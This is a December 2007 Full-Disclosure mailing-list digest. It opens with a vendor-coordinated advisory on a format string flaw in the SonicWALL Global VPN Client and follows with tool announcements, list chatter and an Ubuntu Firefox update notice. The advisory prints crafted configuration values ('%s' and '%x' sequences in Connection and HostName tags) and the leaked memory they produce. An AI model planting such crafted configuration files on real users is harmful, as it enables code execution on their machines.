SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
                  title: SonicWALL Global VPN Client Format String
Vulnerability
                program: SonicWALL Global VPN Client
     vulnerable version: < 4.0.0.830
               homepage: www.sonicwall.com
                  found: 06-12-2007
                     by: lofi42*
             perm. link: http://www.sec-consult.com/305.html
=====================================================================================

Vendor description:
---------------

The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.


Vulnerabilty overview:
---------------

SonicWALL Global VPN Client suffers from a format string vulnerability
that can be triggered by supplying a specially crafted configuration
file. This vulnerability allows an attacker to execute arbitrary code in
the context of the vulnerable client. For a successful attack, the
attacker would have to entice his victim into importing the special
configuration file.


Vulnerability details:
--------------- 

Format string errors occur when the client parses the "name" attribute
of the "Connection" tag and the content of the "Hostname" Tags in the
configuration file.

Examples:

<Connection name=%s%s%s%s> 
<HostName>%s%s%s%s</HostName>

The bugs has been verified in version 3.1.556 and beta 4.0.0.810. With
version 3.1.556 the client has to initiate a connection to trigger the
vulnerability, whereas with version 4.0.0.810, the bug can be exploited
by simply double-clicking the configuration file. This can be attributed
to the 4.0 version trying to write the imported configuration to an
extra debug log.


Proof-of-concept:
--------------- 

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a
crafted config file and then viewing the debug logfile. A configuration
like this...

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x 
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x 

...yields the following logfile:

----------------------< Connection name
>-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been
enabled.' ''
----------------------</Connection name
>-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------


This vulnerability allows reading / writing to arbitrary memory
addresses within the process memory space. Exploitation is trivial under
these circumstances.


vendor status:
---------------
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26

The issue has been fixed in SonicWall VPN client 4.0.0.830.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* The vulnerabilities described above have been purchased by 
  SEC Consult from an independent security researcher.
  In the research bonus programme, SEC Consult is looking for security 
  vulnerabilities in common software products. For more information,
  contact research [at] sec-consult [dot] com



From MMaloney at middlesexcc.edu  Tue Dec  4 13:27:48 2007
From: MMaloney at middlesexcc.edu (Maloney, Michael)
Date: Tue, 4 Dec 2007 08:27:48 -0500
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow
	today?
In-Reply-To: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
References: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
Message-ID: <18D45F1BCFBA494D87CE4CAFE370C650C52397@email.intranet.middlesexcc.edu>

I've noticed a 30K increase per day in traffic..

********************************************
Mike Maloney
Sr. System Engineer
Middlesex County College
2600 Woodbridge Avenue
Edison, NJ 08818
Phone: 732-906-7754
Cell: 908-217-2086
Fax: 732-906-4266
Email: MMaloney at middlesexcc.edu
********************************************

-----Original Message-----
From: Dude VanWinkle [mailto:dudevanwinkle at gmail.com] 
Sent: Monday, December 03, 2007 3:49 PM
To: Ring-of-Fire at yahoogroups.com; funsec; Full-Disclosure; incidents at securityfocus.com
Subject: Anyone have a reason for 2x the email flow today?

My servers are slammed...

Anyone else notice anything?

-JP

-------------------------------------------------------------------------
This list sponsored by: SPI Dynamics

ALERT: .How a Hacker Launches a SQL Injection Attack!.- White Paper 
It's as simple as placing additional SQL commands into a Web Form input box 
giving hackers complete access to all your backend systems! Firewalls and IDS 
will not stop such attacks because SQL Injections are NOT seen as intruders. 
Download this *FREE* white paper from SPI Dynamics for a complete guide to protection! 

https://download.spidynamics.com/1/ad/sql.asp?Campaign_ID=70160000000Cn8E
--------------------------------------------------------------------------


From stefano.dipaola at mindedsecurity.com  Tue Dec  4 16:08:30 2007
From: stefano.dipaola at mindedsecurity.com (Stefano Di Paola)
Date: Tue, 04 Dec 2007 17:08:30 +0100
Subject: [Full-disclosure] The first release of SWFIntruder is out !
Message-ID: <1196784510.5877.62.camel@laptop>

I am proud to announce first release of SWFIntruder.
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically 
developed for analyzing and testing security of Flash applications at
runtime.
It helps to find flaws in Flash applications using the methodology
originally described in Testing Flash Applications [1]
and in Finding Vulnerabilities in Flash Applications [2] .

Some neat feature:
    * Basic predefined attack patterns.
    * Highly customizable attacks.
    * Highly customizable undefined variables.
    * Semi automated Xss check.
    * User configurable internal parameters.
    * Log Window for debugging and tracking.
    * History of latest 5 tested SWF files.
    * ActionScript Objects runtime explorer in tree view.
    * Persistent Configuration and Layout. 

SWFIntruder is hosted @ OWASP:
https://www.owasp.org/index.php/Category:SWFIntruder

and is sponsored by Minded Security (http://www.mindedsecurity.com)

Check it out and let me know!
Any comments will be appreciated.

References:
[1]
http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt

[2]
http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt

Regards, 
Stefano
-- 
Stefano Di Paola
Chief Technology Officer
Director of Minded Security Research Labs

Minded Security - Application Security Consulting

www.mindedsecurity.com




From research at irmplc.com  Tue Dec  4 17:29:50 2007
From: research at irmplc.com (IRM Research)
Date: Tue, 4 Dec 2007 17:29:50 -0000
Subject: [Full-disclosure] TIBCO Rendezvous Exploitation Video
Message-ID: <7B01ACCEDD4FFE48B12A55E2DB16A93026CA91@dccheltenham.local.irmplc.com>

IRM have released a video demonstrating the impact (using a trading
floor scenario) of the recently published TIBCO Rendezvous DoS
vulnerability

http://www.irmplc.com/index.php/158-Messaging-Systems-Security



From lamerbuster at gmail.com  Tue Dec  4 18:37:01 2007
From: lamerbuster at gmail.com (Lamer Buster)
Date: Wed, 5 Dec 2007 00:07:01 +0530
Subject: [Full-disclosure] SecNiche Garbage Dumps on mailinglists
Message-ID: <24dc08970712041037w69e6c08eu52e72ee8a20062c0@mail.gmail.com>

Thanks for your garbage again! I was wondering all these days where
have you vanished and how big garbage you are going to dump on all of
us this time. so all that you want to express in your huge garbage
dump is inurl:ldap. xml site:com allinurl:indexof ldap. xml site:org.


bty your description on how google make queries is one amazing piece
of information. we would had never known this if you would not have
put this in your article. I think you must be drinking enough poo
these days.

shame on you.





-----Original Message-----
From: AKS aka (0kn0ck) [mailto:0kn0ck at secniche.org]
Sent: 04 December 2007 02:57
To: bugtraq at securityfocus.com; websecurity at webappsec.org
Subject: [WhitePaper (SecNiche)] Information Prone LDAP Garbage Dumps

Hi

The LDAP garbage dump that remains on web server results in
information disclosure. Security of LDAP may be compromised, if for
instance a search engine crawls through untamed directories on the web
server and finds information through the ldap.xml file. This type of
harvesting attack is also termed "static information leveraging
attack." This article provides methods for dealing with this type of
attack and clarifying how to secure LDAP

Read it at :
http://www.secniche.org/paper.html
http://www.secniche.org/papers/Inf_Pr_Ldap_Gar_Dumps.pdf

Regards
Aks aka 0kn0ck
http://www.secniche.org



From gmaggro at rogers.com  Tue Dec  4 18:33:15 2007
From: gmaggro at rogers.com (gmaggro)
Date: Tue, 04 Dec 2007 13:33:15 -0500
Subject: [Full-disclosure] SCADA refresher
In-Reply-To: <71c852d10712031601y21a68202td38760820a7d4977@mail.gmail.com>
References: <47505E42.90503@rogers.com>
	<47535341.6060206@rogers.com>	<e024ccca0712031151xd8453fdm9c376f38583fb639@mail.gmail.com>
	<71c852d10712031601y21a68202td38760820a7d4977@mail.gmail.com>
Message-ID: <47559D6B.8040002@rogers.com>

I. D. wrote:
> Datapac? In my experience, there aren't many things left there... of
> course, I don't work in that industry. I thought most transactions/work
> took places on other Canadian packet-switched networks. As for south of
> the border, I know even less.

Well it's been 20 years since I played around on Datapac myself. So
anyone out there in X.25 land or that uses the stuff regularly, it'd be
great to hear facts, statistics and anecdotes ;) Same for frame relay
nowadays too.

I am going to check out what nmap has for IP enabled PLCs and related
gear, SCADA apps, etc. See if anything is lacking and try to contribute
back something to fill the hole(s). Anyone know what the nmap coverage
is like for x25/frame stuff like pad/frad/wtf devices?

I had already started cataloging photos of antennas with the intent of
establishing a database to assist people in identifying frequencies and
uses. Sadly it took a few hours to figure out someone else must have
done this. Came across
http://www.geckobeach.com/cellular/cellpixs/cellid.php and
http://www.geckobeach.com/cellular/cellpixs/fido_pix.php and liked those.

Something along that line but more technical and far more expansive
would be a great idea. An option to submit photos for identification
would be a nice touch and assist in expanding the database. A moderated
newsgroup that accepts binaries might be a better way of accomplishing
the same thing. I fired up Pan to check this morning but did not find
anything. Anyone here with the ability feel like creating a newsgroup? I
mean someone with a real nntp server not some bullshit resold service.



From secreview at hushmail.com  Tue Dec  4 18:44:07 2007
From: secreview at hushmail.com (secreview at hushmail.com)
Date: Tue, 04 Dec 2007 13:44:07 -0500
Subject: [Full-disclosure] Professional IT Security Service Providers -
	Exposed
Message-ID: <20071204184407.E3A0822846@mailserver10.hushmail.com>

Greetings List:

My team and I have started doing critical reviews of security 
companies that offer Professional IT Security Services. We find 
these companies by searching Google for key words like Penetration 
Testing, Vulnerability Assessments, Web Application Security, etc. 
We randomly select one of the companies from the search results and 
begin our review. 

Generally our reviews are done by reading the contents of the 
companies website. We strip away all the marketing fluff and we 
look for untruths, poor grammar, quality of service, team talent 
and capabilities, site clarity, etc. If the website leaves us with 
questions, or sounds too good to be true we call the security 
company being reviewed and engage them in conversation about their 
capabilities and offerings. 

Once we feel that we've studied the target company enough, we form 
a critical opinion and post it in the form of a critical review to 
http://secreview.blogspot.com. Our reviews are non-biased, 
critically honest, and in some cases even a bit harsh.

We're interested in growing our team of reviewers and site authors 
but are looking for legitimate readers and writers. If you are 
interested in doing reviews and having your reviews posted then 
emails us here to let us know. Or, write a review and email it to 
us at secreview at hushmail.com and we'll review it and post it if its 
good. 

Again, the blog URL is: http://secreview.blogspot.com. Spread it 
around, show it to other people, post your comments, and be honest. 
We don't want to give anyone an "incorrect" review, we want the 
reviews to be as accurate and truthful as possible! 

Regards, 
  The Secreview Team
  http://secreview.blogspot.com
  Professional IT Security Service Providers - Exposed

--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJc4GGXbFBkQIWEuJV81lxSTb5bRrR3rPPh9SutJsWSg68/



From trains at doctorunix.com  Tue Dec  4 20:15:28 2007
From: trains at doctorunix.com (trains)
Date: Tue, 04 Dec 2007 14:15:28 -0600
Subject: [Full-disclosure] Professional IT Security Service Providers
	-	Exposed
In-Reply-To: <20071204184407.E3A0822846@mailserver10.hushmail.com>
References: <20071204184407.E3A0822846@mailserver10.hushmail.com>
Message-ID: <20071204141528.34r7zzvu8s4ccsg4@mail.doctorunix.com>

Quoting secreview at hushmail.com:
Greetings List:

My team and I have started doing critical reviews of security
companies that offer Professional IT Security Services. We find ...
<snip>
May I offer a correction.  Try this message:

     "My Team and I have reviewed web sites of companies and
     (based on their web dev skillz and marketing lingo) have
     rated the companies' security capabilities."

based on their web sites.   that makes me sad.  that's right in there  
with counting the number CISSPs at a company.

the sales people I have to work with assure me that the product  
doesn't matter.  they keep telling me, "all that matters is the sizzle  
on the website and the well engineered marketing message".  Every day  
I tell them they are f'd up aholes.

It looks like they are right.

* sigh *



tr

-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication,
security services, systems integration.
Contact:    services at doctorunix.com




From kees at ubuntu.com  Tue Dec  4 20:56:11 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 4 Dec 2007 12:56:11 -0800
Subject: [Full-disclosure] [USN-546-2] Firefox regression
Message-ID: <20071204205611.GZ8789@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-546-2          December 04, 2007
firefox regression
https://bugzilla.mozilla.org/show_bug.cgi?id=405584
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.10:
  firefox                         2.0.0.11+0nobinonly-0ubuntu0.6.10

Ubuntu 7.04:
  firefox                         2.0.0.11+1nobinonly-0ubuntu0.7.4

Ubuntu 7.10:
  firefox                         2.0.0.11+2nobinonly-0ubuntu0.7.10

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Details follow:

USN-546-1 fixed vulnerabilities in Firefox. The upstream update included
a faulty patch which caused the drawImage method of the canvas element to
fail.  This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that Firefox incorrectly associated redirected sites
 as the origin of "jar:" contents. A malicious web site could exploit this
 to modify or steal confidential data (such as passwords) from other web
 sites. (CVE-2007-5947)
 
 Various flaws were discovered in the layout and JavaScript engines. By
 tricking a user into opening a malicious web page, an attacker could
 execute arbitrary code with the user's privileges. (CVE-2007-5959)
 
 Gregory Fleischer discovered that it was possible to use JavaScript to
 manipulate Firefox's Referer header.  A malicious web site could exploit
 this to conduct cross-site request forgeries against sites that relied
 only on Referer headers for protection from such attacks. (CVE-2007-5960)


Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10.diff.gz
      Size/MD5:   320952 8250d87dfbb4c7fb182a3d9d907a640f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10.dsc
      Size/MD5:     1874 63110f2bdcefe502315b17d7f99463eb
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly.orig.tar.gz
      Size/MD5: 44854248 59727bd78e1e2e5285ad495643a8c679

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.11+0nobinonly-0ubuntu0.6.10_all.deb
      Size/MD5:   237584 f0a0f95b51582f6313d34dde515f6022
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.11+0nobinonly-0ubuntu0.6.10_all.deb
      Size/MD5:    56386 bcecbddc0db2db283635a3b288458333
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.11+0nobinonly-0ubuntu0.6.10_all.deb
      Size/MD5:    56482 9343150dfd1fb4a22a1aff81e71e7b92
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.11+0nobinonly-0ubuntu0.6.10_all.deb
      Size/MD5:    56492 cc92e69717452919c99ddda4715cf63c
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10_all.deb
      Size/MD5:    57294 3ae2406b986078ad7149853c40ab73c9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5: 50521182 55aa3f98deb428648466dff20372c61f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:  3178188 21b85f630e244bbd6a5beff8659473e0
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:    90862 6b47fc101cf94e7706b6908d77db3eb7
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5: 10450908 4bb8e1302d8954828f5c1849137fc18b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:   226496 0e3fb01baa7af6f362dcbcf716b3d51a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:   168868 f19315d09da09d0cdb1045edb60eb0f6
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:   251530 5ce0bf97661e753683ce857d0ca6bf77
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_amd64.deb
      Size/MD5:   872732 e51ad0fbd00d3d760dfbf91e55e09dd7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5: 49678950 b731dd58ef86a67509a7eeba766c900e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:  3167512 d4555bff768ab062fa80827d0a44b372
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:    84512 bedf6b188c556ebcb293d71fac25fc1c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:  9269320 3aebff0469d7d9adc0e98e552a9e9f40
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:   226488 5b5ca2116f85dd28f3eb5eb73b2a8f16
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:   158460 cbf4fe26413da01450a011d2bccd72ca
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:   251522 79a32edbfd79077bab75a3d4c3038e98
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_i386.deb
      Size/MD5:   794818 c000b33d6dc505108506ee45c048f32f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5: 52208852 7849ccd50975a29fd12f442788c64063
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:  3175458 772b8cf8aaa3686854243266691a849b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:    86382 c08c5a3ce2ce8c9b33e02acbfdc3f051
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5: 10115048 d6b936461b55ac08be9f1d0acb7523a5
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:   226496 d867c36c822ba7a9651aea8122ea8054
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:   167554 273826fb907eb5b3ce818e762de9f7fc
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:   251512 49e6e3b4094dd513f476a27493472567
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_powerpc.deb
      Size/MD5:   870456 3e0786e77473a2c6b78cfc3126a8d488

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5: 49716744 8765b3293d16bc550a6dd389061cc3a9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:  3165218 42c109ef8277b4154e7c113ba5d3d0fb
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:    84178 ac222a0f8d9e47f69057e410571ef33f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:  9542474 d3f8b2a1ff3ac4d6292ecd346dbf4f09
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:   226496 9705e3f2e4b816e8d8549e9e44dcbcd0
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:   156432 d624432b5d9492c1a8fc503dc7d0114d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:   251532 eb47d7215fa06cb947f1da7ec0a4a363
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+0nobinonly-0ubuntu0.6.10_sparc.deb
      Size/MD5:   776610 be94727aa1108221558f141ef844a23c

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4.diff.gz
      Size/MD5:   314514 78b7228f82d37a4f471232e2edd339ea
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4.dsc
      Size/MD5:     1860 c69b313f300b5644a4873b6ab89f3ad2
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly.orig.tar.gz
      Size/MD5: 44854248 a43dd58b7b6dd56131f7db4b411739ed

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.11+1nobinonly-0ubuntu0.7.4_all.deb
      Size/MD5:   243038 c5450ae05cf3db416c2e03fc9dd3add8
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.11+1nobinonly-0ubuntu0.7.4_all.deb
      Size/MD5:    58360 ac4e127698bdca8dc7646f5ab4988df8
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.11+1nobinonly-0ubuntu0.7.4_all.deb
      Size/MD5:    58456 b751b5c0ac7989a6e15db9735618768a
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.11+1nobinonly-0ubuntu0.7.4_all.deb
      Size/MD5:    58464 879dc023daa0e9627a0317b9d13fbdd9
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4_all.deb
      Size/MD5:    59270 fa5f505b136bccd432d1b3d5f0b7ef18

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5: 50525626 5bc92dc74676a2a9e7fde5d19d4f2ba4
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:  3181476 8ea836942bedc8030a51b0ecfa4dbcb6
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:    92184 b630e458caee931c61fc92a62a4326ba
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:    62160 7aff96bc490d5280c5613bdf36a685b1
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5: 10465592 383123e6281096519d182e7794f21672
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:   228304 c0450b89dc977ee47b02e81055f2f8d5
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:   173846 5dffb27bdb0bf2552197da84bdaeb674
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:   253488 9fdf82b7237bf4df81fff479fe955a1d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_amd64.deb
      Size/MD5:   880480 f8f5eca81c65c4f819da5e6c7ff7b4eb

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5: 49673880 291edc56e6d1a6679884529eaa818eac
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:  3171744 88a7cf270e9494fcdd37623a11bddc2c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:    86398 3e9af61af4bf23980df08f480511d252
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:    61574 4a97c0ec643c2513d245196383e5785c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:  9274248 a25bb8171285a714f995705d63aca076
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:   228310 f324e38856c29f795fc7396dfcb5024e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:   162766 decb1481c37618626408d00914d45816
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:   253488 dac1ff0478d551cd56bab932b9446d16
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_i386.deb
      Size/MD5:   801864 4600ed0c662e4084fecb480457330e6a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5: 52183516 829215a4a469dfe5229a0af920fdf839
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:  3184272 0d7bac81c45b3e1deb37caeb9771e742
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:    90208 ed02e43e1527dbf561d1e5a1888e6548
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:    62410 7fd0bfd6c17bad749036a41114b433cc
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5: 10344256 41d5a51dff246a23f96ced60f5827727
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:   228304 a720546e6f52dff87725f1296ab208e9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:   179488 3c1b143bfd507faab657af270a3a20d8
